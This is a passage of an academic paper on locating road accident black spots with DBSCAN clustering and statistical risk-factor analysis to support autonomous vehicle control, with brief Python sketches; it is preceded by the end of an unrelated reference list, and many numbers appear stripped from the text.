grevet c, terveen lg, gilbert e. . managing political differences in social media. in: proceedings of the th acm conference on computer supported cooperative work & social computing. new york: acm, – .
hart w, albarracín d, eagly ah, brechan i, lindberg mj, merrill l. . feeling validated versus being correct: a meta-analysis of selective exposure to information. psychological bulletin ( ): – doi . /a .
hosanagar k, fleder d, lee d, buja a. . will the global village fracture into tribes? recommender systems and their effects on consumer fragmentation. management science ( ): – doi . /mnsc. . .
kastenmüller a, greitemeyer t, jonas e, fischer p, frey d. . selective exposure: the impact of collectivism and individualism. british journal of social psychology ( ): – doi . / x .
koutra d, bennett p, horvitz e. . events and controversies: influences of a shocking news event on information seeking. technical report. arxiv preprint. arxiv: . .
matsa ke, mitchell a. . key takeaways about social media and news. available at http://www.journalism.org/ / / / -key-takeaways-about-social-media-and-news/ (accessed september ).
mckenzie cr. . hypothesis testing and evaluation. in: koehler dj, harvey n, eds. handbook of judgment and decision making. oxford: blackwell, – , chapter .
meiss mr, menczer f, fortunato s, flammini a, vespignani a. . ranking web sites with real user traffic. in: proceedings of the international conference on web search and data mining. new york: acm, – .
mervis j. . an internet research project draws conservative ire. science ( ): – doi . /science. . . .
mobasher b, cooley r, srivastava j. . automatic personalization based on web usage mining. communications of the acm ( ): – doi . / . .
munson sa, resnick p. . presenting diverse political opinions: how and how much. in: proceedings of the sigchi conference on human factors in computing systems. new york: acm, – .
nickerson rs. . confirmation bias: a ubiquitous phenomenon in many guises. review of general psychology ( ): – doi . / - . . . .
nyhan b, reifler j. . when corrections fail: the persistence of political misperceptions. political behavior ( ): – doi . /s - - - .
pariser e. . the filter bubble: how the new personalized web is changing what we read and how we think. london: penguin.
ricci f, rokach l, shapira b, kantor pb. . recommender systems handbook. new york: springer.
sen a. . on economic inequality. oxford: oxford university press.
shannon ce. . a mathematical theory of communication. the bell system technical journal ( ): – doi . /j. - . .tb .x.
silverman c. . the backfire effect. available at http://www.cjr.org/behind_the_news/the_backfire_effect.php?page=all (accessed april ).
stanovich ke, west rf, toplak me. . myside bias, rational thinking, and intelligence. current directions in psychological science ( ): – doi . / .
sunstein cr. . the law of group polarization. journal of political philosophy ( ): – doi . / - . .
sunstein cr. . republic.com . . princeton: princeton university press.
analysis of historical road accident data supporting autonomous vehicle control strategies

sándor szénási, faculty of economics and informatics, j. selye university, komárno, slovakia; john von neumann faculty of informatics, Óbuda university, budapest, hungary

abstract
it is expected that most accidents occurring due to human mistakes will be eliminated by autonomous vehicles. their control is based on real-time data obtained from the various sensors, processed by sophisticated algorithms, and the operation of actuators. however, it is worth noting that this process flow cannot handle unexpected accident situations, like a child running out in front of the vehicle or an unexpectedly slippery road surface. a comprehensive analysis of historical accident data can help to forecast these situations. for example, it is possible to localize areas of the public road network where the number of accidents related to careless pedestrians or bad road surface conditions is significantly higher than expected. this information can help the control of the autonomous vehicle to prepare for dangerous situations long before the real-time sensors provide any related information. this manuscript presents a data-mining method working on already existing road accident database records to find the black spots of the road network. as a next step, a further statistical approach is used to find the significant risk factors of these zones; this result can be built into the control strategy of self-driven cars to prepare them for these situations and to decrease the probability of further incidents. the evaluation part of this paper shows that the robustness of the proposed method is similar to that of the already existing black spot searching algorithms; however, it provides additional information about the main accident patterns.
subjects autonomous systems, data mining and machine learning, spatial and geographic information systems
keywords data mining, dbscan, road accident, statistics, autonomous vehicle, road safety

how to cite this article szénási s. . analysis of historical road accident data supporting autonomous vehicle control strategies. peerj comput. sci. :e doi . /peerj-cs. submitted october, accepted january, published february. corresponding author: sándor szénási, szenasi.sandor@nik.uni-obuda.hu. academic editor: chintan amrit. copyright szénási, distributed under creative commons cc-by.

introduction

human drivers have many disadvantages compared to autonomous vehicles (slower reaction time, inattentiveness, variable physical condition) (kertesz & felde, ). nevertheless, they can often perform better (chatterjee et al., ) in some unexpected situations, like a child running out in front of the vehicle, because, beyond the information gained in real time, they may have specific knowledge about a given location (linked to the previous example, the human driver may know that there is a playground without a fence near the road; therefore, the appearance of a child is not unexpected). drivers also have some incomplete but useful historical knowledge about accidents, and they can build this information into their driving behavior. if they know that there were several pedestrian collisions somewhere, they will decrease the speed and try to be more attentive without triggering any real-time signals. thanks to this behavior, they can prepare for and avoid some types of accidents, which would not be possible without this historical data. another example might be a road section which is usually extremely slippery on rainy days. real-time sensors may detect the slipping only when it is too late to avoid the consequences. some historical accident data can help to prepare the car for these unexpected situations.

we propose the following consecutive steps to integrate historical data into the control algorithm for autonomous devices:
1. localize accident black spots in an already existing accident database, using statistical or data-mining methods;
2. determine the common reasons for these accidents with statistical analysis or pattern matching;
3. specify the necessary preventive steps to decrease the probability of further accidents.

this article mainly focuses on the first two steps because the third one largely depends on the limits and equipment of the self-driven car. for example, in the case of dangerous areas, is it possible to increase the power of the lights to make the car more visible? in the case of a large chance of pedestrian accidents, is it possible to increase the volume of the artificial engine sound to avoid careless road crossing? can the car change the suspension settings to prepare for potentially dangerous road sections? the scope of this paper is the development of the theoretical background to support these preliminary protection activities. the appropriate preliminary actions may significantly decrease the number and severity of road accidents.
for example, carsten & tate ( ) present a model of the relationship between changes in vehicle speed and the number of accidents that occur. it is visible from this model (based on the national injury database of great britain to predict the effects of speed on road accidents) that for each km/h change in mean speed, the best-estimated change in accident risk is %. accordingly, it is worth making assumptions about the dangerous areas and adapting the control of autonomous cars to these predictions.

background

black spot identification

black spot management (identification, analysis, and treatment of black spots in the public road network) is one of the most important tasks of road safety engineers. the identification of these extremely hazardous sections is the first step to prevent further accidents or to decrease their severity. it is a heavily researched area, and there are several theoretical methods for this purpose. although black spot management has a long tradition in traffic engineering, interestingly, there is no generally accepted definition of road accident black spots (also known as hot spots); the official definition varies by country. it follows that the method used to find these hazardous locations also varies by country. for example, by the definition of the hungarian government, outside built-up areas black spots are defined as road sections no longer than meters where the number of accidents during the last three years is at least . according to this, road safety engineers use simple threshold-based methods (for example, the traditional sliding window technique) to find these areas. switzerland uses a significantly different definition: black spots are sections of the road network (or intersections) where the number of accidents is "well above" the number of accidents at comparable sites. the key difference is the term "comparable sites", because these advanced comparative methods do not try to classify each road segment by itself but compare it to similar areas. there are some general attributes of accident black spots that help to overcome the conceptual confusion. these are usually well-defined sections or intersections of the public road network where road accidents are historically concentrated (elvik, ; delorme & lassarre, ; murray, white & ison, ; montella et al., ; hegyi, borsos & koren, ). nowadays, road accidents are monitored by governments, and all data about accidents are stored in large, reliable, and partially public databases (without any personal information about the participants). much data about the road network is also available (road layout, speed limits, tables, etc.). as a result, road safety engineers can use several procedures from various fields (statistics, data mining, pattern recognition) to localize accident black spots in these databases. it is a common assumption that the number of accidents is significantly higher at these locations compared to other sections of the road network. however, this alone is neither a necessary nor a sufficient condition. the variation of the average yearly accident count of road sections is relatively high compared to the number of accidents. because of this, the regression to the mean effect can distort the historical data. a given section with more accidents than average is not necessarily an accident black spot.
the converse is also true, as there may be true black spots with relatively few accidents in a given year. although this deficiency is theoretically well known, most black spot identification methods are based on the accident numbers of the last few years, simply because this is the best place to start a detailed analysis. nevertheless, it is always worth keeping in mind that these locations are just black spot candidates, and further examination is needed to make the right decision concerning them. the best way to do this is via a detailed scene investigation, but it is very expensive and time-consuming. another theoretical approach can be the analysis of accident data to find some irregular patterns and identify one or more risk factors causing these accidents. without these, it is possible that the higher frequency of accidents is purely coincidental at a given location and time.

to localize potential accident black spots, the most traditional procedure is the sliding window method (lee & lee, ; elvik, ; geurts et al., ). the input parameters of the process are the section length and a threshold value. the method is based on the following:
1. divide the selected road into small uniform-sized sections;
2. count the number of accidents that have occurred in the last few years for each section;
3. flag the segments where this number is higher than a given threshold as potential black spots.

there are many variants of the traditional sliding window method (anderson, ; szénási & jankó, ). a potential alternative is to use a variable window length. one of its advantages is that it is unnecessary to set one exact window length; it is sufficient to give a minimal and a maximal value. the method can try several window lengths to find the largest black spots possible. due to this modification, it can find small local black spots and larger ones too. the traditional sliding window method uses non-overlapping segments, but it is also possible to slide the window with smaller steps than the window size. this leads to a more sensitive method, which can find more black spot candidates. however, it is then also necessary to manage the overlapping black spots (considering these as one big cluster, or as multiple distinct ones). it is worth mentioning that the method has some additional advantages: it has very low computational demand (compared to the alternatives) and is based only on the road accident database. the sliding window method is one of the first widely used procedures; therefore, it is based on the traditional road number + section number positioning system (for example, the accident location is given as a road number and a kilometer+meter section). this traditional positioning system was the only real alternative in the past. however, in recent decades, the spread of gps technology has made it possible to collect the spatial coordinates of accidents. this step has several benefits (faster and more accurate localization) but also requires the rethinking of the already existing methods. it is possible to extend the sliding window method to a two-dimensional procedure, but this is not widely used. it is better to seek out more applicable methods that fit the spatial systems given by the gps coordinates.
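as a rough sketch of the windowing logic described above (not the exact implementation used in this paper), the following fragment flags fixed-length, non-overlapping sections whose accident count reaches a threshold; the function name, section length, and threshold are illustrative assumptions.

```python
from collections import Counter

def sliding_window_black_spots(accidents_m, section_length_m=1000, threshold=4):
    """Hypothetical sketch of the traditional sliding window method.

    accidents_m: positions of accidents along one road, in metres from the
                 start of the road (road number + section positioning system).
    Returns (section_start_m, accident_count) pairs whose count reaches the
    threshold, i.e. black spot candidates.
    """
    counts = Counter(int(pos // section_length_m) for pos in accidents_m)
    return [(idx * section_length_m, n)
            for idx, n in sorted(counts.items()) if n >= threshold]

# example: accident positions (metres) collected over the last few years
candidates = sliding_window_black_spots([120, 450, 830, 910, 980, 2400, 5100, 5300])
# -> [(0, 5)]  (the first 1000 m section holds five accidents)
```

a variable-length or overlapping-window variant would simply call such a routine with several section lengths or offsets and merge the overlapping candidates.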
from this field, kernel density estimation (kde) methods are one of the most popular spatial data analysis techniques (bíl, andrášik & janoška, ; flahaut et al., ; anderson, ; yu et al., ; toran & moridpour, ). these have been employed in many research projects to analyze road accidents. kde methods have the advantages of simple implementation and easy interpretation. they also naturally handle noise in the data (caused by the inaccuracy of gps devices). in general, kde is used to estimate the probability density function of a random variable. from the safety experts' point of view, the result of the kde method is an accident density estimate at a given reference point. the procedure has several parameters, such as the search radius around the reference point (bandwidth or kernel size) and the kernel function.

several researchers recommend the use of empirical bayesian methods, combining the benefits of the predicted and historical accident frequencies. these models usually analyze the distributions of the already existing historical data from several aspects, and give predictions about the expected accident state. in the empirical bayesian method, the existing historical accident count and the expected accident count predicted by the model are added using different weights (ghadi & török, ). because of this, the process requires an accurate accident prediction model.

another group of already available methods is based on clustering techniques. these procedures come from the field of data mining, where clustering is one of the widely used unsupervised learning methods. in this context, a cluster is a group of items which are similar to each other and differ from items outside the cluster. using this concept in the field of black spot searching, accidents with similar attributes (where the attributes can be the location and/or other risk factors) can be considered as one cluster. most studies use the basic k-means clustering method (mauro, de luca & dell'acqua, ), but there are also some fuzzy-based c-means solutions.

as already mentioned, the results of the proposed methods are just a set of black spot candidates. further analysis is needed to make a final, valid decision as to whether a candidate is a real accident black spot and whether it requires any action. this is the point where our research turns away from traditional road safety management work (identification and elimination of black spots). based on the collected clusters, road safety engineers must select the black spot candidates having the largest safety potential, which is based on the prediction of the effect of the best available preventive action (the cost of the local improvement activity compared to the expected benefits in the number and severity of further accidents). from the perspective of autonomous car control, the role of this safety potential is essential: the self-driven car has no option to fix road safety problems itself; the only important information is the existence of accident black spots and the potential safety mechanisms which may help to avoid further crashes. as a second difference, from the road safety engineers' point of view, it is not necessary that the accidents of a given black spot have common characteristics.
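for reference, the empirical bayesian combination mentioned above is often written in the following form in the road safety literature; this particular weight expression is a common textbook parameterization and an assumption here, not a formula quoted from ghadi & török ( ).

```latex
\hat{N}_{\mathrm{EB}} = w\,\mu + (1 - w)\,x, \qquad w = \frac{1}{1 + \mu/\varphi}
```

where μ is the accident frequency predicted by the model for comparable sites, x is the observed historical accident count of the examined site, and φ is the overdispersion (shape) parameter of the prediction model; the less reliable the prediction, the more weight the observed historical count receives.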
the hot spot definition of this paper assumes that accidents of a given cluster have similar attributes, because this pattern will be the basis of the preventive actions. the localization of accident black spot candidates is a heavily researched area, and there are several fully automated methods to find these. nevertheless, the further automatic pattern analysis of these candidates is not as well developed. this phase usually needs a great deal of manual work by human road safety experts (they must travel to the scene and investigate the environment to support their decisions about recommended actions). this process is supportable by some general rules but is mostly done manually, using the pattern-matching capability of the human mind. to fully automate it, it is necessary to make this method applicable to self-driven cars. according to this objective, this paper focuses on helping autonomous vehicles take the appropriate preventive actions to avoid accidents:
• localize black spot candidates using the historical accident database;
• make assumptions about the common risk factors and patterns of these accidents;
• according to these preliminary results, the autonomous device will know where the dangerous areas are and what preventive actions to take.

automated accident prevention

autonomous vehicles will have several ways to avoid accidents; therefore, this is a hot, widely researched topic. nevertheless, most papers deal with options existing only in the far future, when autonomous devices will be part of a densely connected network without any human interference. real-world implementations are far from this point, but some technologies already exist, although they are not closely related to autonomous vehicles. currently implemented accident prevention systems are built into traditional cars as braking assistants and similar functions. however, it is worth considering these, because such methods will be the predecessors of the future techniques applicable to self-driven vehicles. the two main classes of accident prevention systems are passive and active methods. passive systems send warning notifications to the driver but do not perform any active operations. on the contrary, active methods have the right to perform interventions (braking, steering, etc.) to avoid accidents. it seems obvious that these prevention systems have a large positive impact, and it has already been shown by jermakian ( ) that passive methods have significant benefits: more than one million vehicle crashes are prevented in the usa each year. as harper, hendrickson & samaras ( ) proved, the cost-benefit ratio of these systems is also positive. brake assist systems are one of the most researched active systems, where the potential benefits are a lower risk of injury and less serious injuries of pedestrians (rosén et al., ). current forward-looking crash avoidance systems usually continuously scan the space in front of the vehicle using various devices (camera, radar, lidar, etc.). if any of these detects an unexpected vehicle or pedestrian, the brake assistant system takes the appropriate (preliminary) actions, which can be the amplification of the driver's braking or direct autonomous emergency braking.
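purely as an illustration of how the preliminary information advocated in this paper could complement such sensor-driven systems (and not as a description of any existing product), the following sketch looks up precomputed black-spot zones near the vehicle's current position; every name, field, and threshold in it is a hypothetical assumption.

```python
import math

def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance between two GPS points, in metres."""
    r = 6_371_000.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp, dl = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def preventive_hints(position, black_spots, warning_radius_m=300.0):
    """Return the risk factors of precomputed black spots near the vehicle.

    black_spots: iterable of dicts such as
        {"lat": ..., "lon": ..., "risk_factor": "pedestrian"}   (hypothetical schema)
    The control layer may then, for example, lower the target speed or raise
    sensor sensitivity before any real-time signal is triggered.
    """
    lat, lon = position
    return [bs["risk_factor"] for bs in black_spots
            if haversine_m(lat, lon, bs["lat"], bs["lon"]) <= warning_radius_m]
```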
bálint, fagerlind & kullgren ( ) presented very promising results with a test-based methodology for the assessment of braking and pre-crash warning systems. such systems typically use only the real-time information given by the vehicle sensors, without any knowledge extracted from historical accident data. run-time crash prediction models are also related to the topic of this paper. hossain et al. ( ) presented a comprehensive comparison and review of existing real-time crash prediction models. the basic assumption of these systems is that the probability of a crash situation within a short time window is predictable from the current environmental parameters measured by the sensors. accordingly, most of the already existing methods use only the acquired sensor data to make real-time decisions about potential crash situations, and the authors do not use the already existing accident databases as an input to fine-tune the system's predictions.

the work of lenard, badea-romero & danton ( ) is closer to the research presented in this paper. they analyzed the common accident scenarios to support the development of autonomous emergency braking protocols. based on the hierarchical ascending method applied to two british accident databases filtered by some previously defined conditions (they use only the urban pedestrian accidents that occurred in daylight and with fine weather conditions), the attributes of the most common accident scenarios were presented. their paper defines the major accident scenarios and classifies all existing pedestrian accidents into one of these categories. the results of this research would be useful in the training phase of a self-driven vehicle to introduce all possible scenarios to the algorithm. the objective of nitsche et al. ( ) is similar: they propose a novel data analysis method to detect pre-crash situations at various (t- and four-legged) intersections. the purpose of this work is also to support the safety tests of autonomous devices. they clustered accident data into several distinct partitions with the well-known k-medoids procedure. based on these clusters, an association rules algorithm was applied to each cluster to specify the driving scenarios. the input was a crash database from the uk (containing one thousand junction crashes). the result of the paper contains thirteen crash clusters describing the main pre-accident situations.

materials and methods

black spot candidate localization

density-based spatial clustering of applications with noise

for the black spot candidate localization step, the density-based spatial clustering of applications with noise (dbscan) algorithm was used. it is not widely used in the field of road safety engineering; however, it is one of the most efficient density-based clustering methods from the field of data mining. the main objective of density-based clustering is the following: the density of elements within a cluster must be significantly higher than between separate clusters. this principle distinguishes two classes of elements: items inside a cluster and the outliers (elements outside of any cluster). in the road safety task, the elements are the accidents of the public road network. these are identified by spatial gps coordinates and have several additional attributes (time, accident nature, etc.).
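as an illustration of what one such element may look like in code (the field names below are hypothetical and not the schema of the database used in this study):

```python
from dataclasses import dataclass
from datetime import datetime

@dataclass
class AccidentRecord:
    """One element of the historical accident database: a GPS position
    plus descriptive attributes (hypothetical field names)."""
    latitude: float          # WGS84 GPS coordinates of the accident
    longitude: float
    occurred_at: datetime    # time of the accident
    nature: str              # e.g. "pedestrian collision", "slippery surface"
    severity: str            # e.g. "slight", "serious", "fatal"
```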
the general dbscan method needs a definition for distance calculation between two elements. in the case of road accidents, the euclidean distance between the two gps coordinates was used (black spots are usually spread over a small area; therefore, it is a good estimation of the real road network distances). the dbscan method requires two additional parameters:

- ε: a radius-type variable (meters);
- minpts: the lower limit for the number of accidents in a cluster (accidents).

the main definitions of the dbscan algorithm are as follows:

- the ε-environment of a given element x is the space within the ε radius of x;
- x is an internal element if the ε-environment of x contains at least minpts elements (including x itself);
- x is directly densely reachable from y if x is in the ε-environment of y and y is an internal element;
- x is densely reachable from y if it is accessible through a chain of directly densely reachable elements starting from y;
- all points not densely reachable from any internal element are the outliers;
- if x is an internal element, then it forms a cluster together with all elements densely reachable from x.

the objective of the process is to find clusters of accidents in the public road network in which all elements are densely connected and no further expansion is possible. the steps to achieve this are as follows:

1. select one internal element from the accident database as the starting point. this will be the first point of the cluster.
2. extend the cluster recursively with all directly densely reachable elements from any point of the cluster.
3. if it is not possible to extend the cluster with additional points, the cluster can be considered final (it contains all the densely reachable items from the starting point). if this cluster meets the prerequisites for a black spot candidate, it is stored in the result set.
4. repeat steps 1-3 for all internal elements of the database.

the result of the presented procedure is a set of black spot candidates. the prerequisites checked in step 3 can be one or more of the following:

- the number of accidents should be more than a given threshold;
- the accident density of the given area should be more than a given threshold.

the proposed method has several advantages over the traditional methods. unlike the sliding window algorithm, which analyzes only the accidents of a given road section, dbscan is a spatial algorithm managing all accidents of the database together. this difference is substantial in the case of junctions where the accidents of the same junction were assigned to different road numbers. it can be especially critical in built-up areas and at traffic roundabouts, where the number of connected roads is high.

determination of accident density

one of the benefits of the traditional sliding window method is that it is easy to interpret for human experts. the number of accidents in a given road section is a very informative number. it is also easy to calculate derived values, like the accident density, which is the number of accidents divided by the length of the road section. this divisor is often extended with the traffic rate or the length of the time period. in the case of spatial black spot localization techniques, the definition of road accident density is more complex. these methods are not based on road sections, so division by the section length is not applicable.
it is necessary to calculate the area of the black spot to use it as a divisor. this article proposes a novel method to calculate the area of the region spanned by the black spot accidents. it finds the smallest boundary convex polygon containing all accidents of a given cluster. the density of the black spot will be the number of accidents divided by the area of this polygon. the area is calculated by gauss' area formula:

$$A(C) = \frac{1}{2}\left|\sum_{i=1}^{n-1} x_i y_{i+1} + x_n y_1 - \sum_{i=1}^{n-1} x_{i+1} y_i - x_1 y_n\right| = \frac{1}{2}\left|x_1 y_2 + x_2 y_3 + \dots + x_{n-1} y_n + x_n y_1 - x_2 y_1 - x_3 y_2 - \dots - x_n y_{n-1} - x_1 y_n\right|$$

where

- A(C): the area of the C polygon (cluster);
- n: the number of vertices of the polygon;
- (x_i, y_i): the two-dimensional coordinates of the i-th vertex of the C polygon (where i ∈ {1, 2, …, n}).

if the number of accidents is less than three, the proposed area concept is not applicable. however, clusters with one or two accidents are usually not considered as black spot candidates; therefore, this is not a real limitation. in the case of clusters with more than two accidents, the accident density is calculated as:

$$\rho(C) = \frac{|C|}{A(C)}$$

where

- ρ(C): the accident density of the C cluster;
- |C|: the number of accidents in the C cluster.

the formula requires the sequence of corner coordinates of the polygon in a given order (in this case, a clockwise direction). the traditional dbscan algorithm continuously builds the cluster from a starting point, and the result is a set of accidents. consequently, an additional step is needed to give the corner points in the appropriate order. it is possible to do this after the dbscan finishes, but it is also possible to extend the dbscan method with the following steps:

- in the case of the first (p1) and second (p2) items, the concept of a "polygon" cannot be interpreted; hence, these are automatically marked as corner points of the polygon.
- with the third point (p3), the items already form a polygon. the p3 point must be on the right side of the vector p1p2, which can be checked using a scalar multiplication, to ensure the clockwise direction requested by the gauss formula. if this is not the case, it is necessary to change the order of p1 and p2. after that step, p1, p2 and p3 will be the corner points of the polygon in a clockwise direction.
- for every additional point (p4, p5, …, pn), it must be checked whether the new point is inside the actual boundary convex polygon or not. it is possible to check whether the new point (pnew) is on the right side of each boundary vector. if this is true for every vector, the point must be inside the polygon (or on its border); therefore, it is not necessary to modify the shape. if the new point is on the left side of any boundary vector, then it is outside the boundary convex polygon. in this case, there must be a sequence of one or more consecutive vectors breaking the rule. let k and l denote the first and last vectors of this sequence. it is possible to substitute the p(k−1), pk, p(k+1), …, p(l−1), pl, p(l+1) part of the boundary vector list with p(k−1), pnew, p(l+1). because of the convexity of the original polygon, the p(k−1), pnew, p(l+1) triangle contains all the pk, p(k+1), …, p(l−1), pl points, and the transformation also ensures the convexity of the new polygon and the clockwise direction of the corner points.
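a minimal python sketch of this area and density calculation, assuming the corner points are already available in clockwise order and are given in a planar, metric projection (so the area comes out in square meters):

```python
from typing import List, Tuple

Point = Tuple[float, float]  # projected (x, y) coordinates in meters

def polygon_area(corners: List[Point]) -> float:
    """gauss (shoelace) area A(C) of a convex polygon given in clockwise order."""
    n = len(corners)
    if n < 3:
        raise ValueError("the area concept needs at least three corner points")
    s = 0.0
    for i in range(n):
        x_i, y_i = corners[i]
        x_j, y_j = corners[(i + 1) % n]  # the next corner, wrapping back to the first one
        s += x_i * y_j - x_j * y_i
    return abs(s) / 2.0

def accident_density(cluster_size: int, corners: List[Point]) -> float:
    """rho(C) = |C| / A(C) for clusters with at least three accidents."""
    return cluster_size / polygon_area(corners)
```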
three figures about this process have been attached to the article in the supplemental file “dbscan images”. it is possible to calculate the black spot area and the accident density of a given cluster using the previous method. analysis of black spot candidates the result of the various black spot localization algorithms (sliding window, clustering, etc.) is a list of potential hot spots. however, having some accidents in a cluster does not mean that the hazard of accidents is significantly higher here. it is usually accepted by researchers that the number of accidents in a given area (section) of the road network fits the poisson distribution. a special feature of road accident distribution is that the number of accidents is relatively low (compared to the size of the road network), and the variance is high. therefore, the volatility of the accident number is very high, which means that a given cluster where the number of accidents is above the average is not inevitably a hot spot. the list given by the previous methods needs further examination to find the real hazardous sites. at this point, the methodology of this paper significantly differs from the work of road safety engineers. their objective is to find hazardous sites and take the appropriate actions to decrease the probability of further accidents. they must select the sites having the largest safety potential where the best cost-effective actions can be taken to decrease the number and severity of accidents. it is a very complex procedure based on the data of historical accidents, the expected number of accidents, the environmental conditions and the cost/expected benefits of different safety actions. contrary to this, the objective of a self-driven car is not the elimination of road safety problems. as an ordinary participant of traffic, it has no chance to make the road network better. nevertheless, as a passive participant, it should be able to localize the problematic areas, analyze these, and take the necessary preliminary steps to avoid further accidents. another difference between the methods of these fields is that from the perspective of road safety engineers, it is not necessary that the accidents of a given black spot have any special patterns or common characteristics. for the self-driven car, the localization of high-risk areas where the number of accidents is significantly higher than expected is szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ not enough because this fact does not help to take the appropriate preliminary steps. this is the reason why this paper focuses on the identification of accident reasons. the result of this further investigation can be one of the following: � if it is not possible to identify any unexpected pattern in the accident attributes then the cluster cannot be considered as an accident black spot. the high number of accidents is just a coincidence and there are no suggestions to avoid further crashes. � in contrast, if there is a special pattern in the accident attributes then this cluster has the potential to decrease the probability of further crashes. these reasons for similar accidents would be related to the road network, weather, lighting conditions or human errors (drivers and pedestrians). in the second case, the knowledge of this special pattern (the common reasons for accidents in the same cluster) can be essential. 
it is presumable that it is possible to avoid accidents caused by the car itself. for example, if it is visible from the accident database that the number of accidents caused by slippery road is significantly higher than expected in a given area, the self-driven car should decrease the speed or change its trajectory to reduce the probability of this event. however, it is also worth noting that the preliminary actions can be very useful to decrease the probability of accidents caused by other drivers or pedestrians. for example, if the historical accident data contains patterns that the number of accidents caused by pedestrians is higher than expected, then the self-driven car would proactively try to decrease this negative potential using some type of visual or auditory warning or decreasing speed. deducing the environmental reasons for accidents accident databases usually contain certain taxonomy for accident types. these are usually structured classes of specific events and reasons, and scene investigators must classify each accident into one of these categories, which is very important statistical information. this method has several limitations because it is rare when the occurrence of an accident originates in one specific reason. usually, multiple reasons, forming a complex structure, cause an accident. for example, the investigator codes the accident as a type of “catching-up accident”, but this does not give any information about why the accident occurs. it is also typical that most of the accidents in the hungarian road network are caused by “incorrect choice of speed”. however, it is obvious that not just the speeding itself was the triggering reason for these accidents. there should be other factors (besides, it is unarguable that speeding increases the effects of other factors and makes certain accidents unavoidable). based on these experiences, this paper does not try to assign all accidents to mutually exclusive accident reason classes. contrarily, the proposed method defines several potential accident reasons, which are not mutually exclusive. these factors can be complementary and having different weights and roles in the occurrence of the accident. only the reasons with potential preventive operations are discussed because these have valuable information for the self-driven car. szénási ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the proposed method is based on the following consecutive steps: . all known accidents are analyzed by all possible accident reasons, and a score value is assigned to the accident showing how much the accident is affected by a given factor. . the distribution of these score values is approximated by the examination of all known accidents. . based on the result of the previously presented dbscan algorithm, the distribution of these score values is also calculated for each black spot candidate. . the distributions for all accidents and a given black spot are compared. if the distribution of a given factor is significantly differing (to the positive direction), the cluster is marked as a hazardous area for the given factor. the independent accident reason factors, like “slippery road”, “bad visibility”, “careless pedestrians”, etc. are defined as r , r ,…, rn, where n is the number of these. as discussed previously, these reasons are not stored directly in the database but can be inferred from the general attributes of accidents. 
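as a compact overview, these consecutive steps could be wired together as in the following sketch; the significance level and the helper names are assumptions for illustration, and the scoring and testing details are sketched in the sections that follow:

```python
from scipy import stats

def mean_significantly_higher(sample, population, alpha):
    """one-tailed welch comparison of the means (detailed later in the statistical-test section)."""
    _, p = stats.ttest_ind(sample, population, equal_var=False, alternative="greater")
    return p < alpha

def analyse_black_spot_candidates(accidents, clusters, reasons, alpha=0.05):
    """outline of the proposed factor analysis over the dbscan candidates.

    accidents : all records of the accident database (the full population d)
    clusters  : black spot candidates produced by the dbscan step
    reasons   : accident reason factors r_1 ... r_n with their weighting tables
    alpha     : assumed level of significance for the hypothesis test
    """
    flagged = []
    for reason in reasons:
        # steps 1-2: score every known accident and keep the population of scores
        population_scores = [reason.score(x) for x in accidents]
        for cluster in clusters:
            # step 3: the same scores restricted to the accidents of one candidate
            cluster_scores = [reason.score(x) for x in cluster]
            # step 4: flag the cluster if its score distribution is shifted upwards
            # compared to the whole database
            if mean_significantly_higher(cluster_scores, population_scores, alpha):
                flagged.append((cluster, reason))
    return flagged
```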
a scoring table is used for this purpose: the weights of the i-th accident factor (1 ≤ i ≤ n) are stored as w^i, where w^i_{attr=value} gives the score of the r_i accident reason when the attr attribute equals value. accordingly, the cumulative score of the r_i reason for the accident x is:

$$s_i(x) = \sum_{attr \in A(x)} w^i_{attr = x.attr}$$

where s_i(x) is the score value of the r_i reason for accident x, x.y corresponds to the value of the specific y attribute of the x accident, and A(x) contains all the available known attributes of x. it is also possible to calculate the same value not just for one accident but for all accidents of a black spot candidate. the H_i(C) set contains the s_i(x) score values of all x accidents in the C cluster:

$$H_i(C) = \{\, s_i(x) \mid x \in C \,\}$$

distribution of accident scores

as a further step, it is necessary to determine whether there is any significant reason which proves that the C set is a real hot spot or not. for a well-established decision, it is necessary to analyze all the accidents in the database to determine the main characteristics of the distributions of all r reasons. based on these results, it is possible to compare the distribution of the H_i(C) values of the examined hot spot candidate C with the reference values Ĥ_i of the whole accident database (D) for a given r_i reason:

$$\hat{H}_i = \{\, s_i(x) \mid x \in D \,\}$$

if the distributions of H_i(C) and Ĥ_i are the same, it can be assumed that the r_i reason has no significant role in the accumulation of accidents. otherwise, if these distributions differ in the sense that the r_i score values are higher in H_i(C) than in Ĥ_i, there may be some causal relationship between them. hypothesis tests can show whether the mean value of a given accident reason score (r_i) in a given cluster is higher than the same mean for all accidents in the database. the alternative hypothesis used states that the mean score of the cluster minus the mean score of the whole population is greater than zero; the null hypothesis covers all other possible outcomes:

$$H_0: \mu_C - \mu_D \le 0$$
$$H_1: \mu_C - \mu_D > 0$$

where:

- μ_C is the mean score value of the black spot candidate;
- μ_D is the mean score value of all accidents in the database (full population).
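a minimal sketch of how the s_i(x) scores and the H_i(C) and Ĥ_i sets defined above could be computed; the nested weight-table layout, the dictionary-based accident records and the numeric values are assumptions made for illustration only:

```python
from typing import Dict, List

# weights[reason][attribute][value] -> score contribution of that attribute value;
# the concrete numbers come from the published scoring tables (placeholders below)
Weights = Dict[str, Dict[str, Dict[str, float]]]

EXAMPLE_WEIGHTS: Weights = {
    "slippery_road": {
        "road_surface": {"oily, slippery": 1.0, "snowy": 0.8},   # placeholder weights
        "weather": {"snowy": 0.6, "rainy": 0.3, "sunny": 0.0},   # placeholder weights
    }
}

def score(accident: Dict[str, str], reason: str, weights: Weights) -> float:
    """s_i(x): sum of the weights of all recorded attribute values of accident x."""
    table = weights.get(reason, {})
    return sum(table.get(attr, {}).get(value, 0.0) for attr, value in accident.items())

def cluster_scores(cluster: List[Dict[str, str]], reason: str, weights: Weights) -> List[float]:
    """H_i(C): the score values of every accident x in cluster C."""
    return [score(x, reason, weights) for x in cluster]

def population_scores(database: List[Dict[str, str]], reason: str, weights: Weights) -> List[float]:
    """H^_i: the score values of every accident x in the whole database D."""
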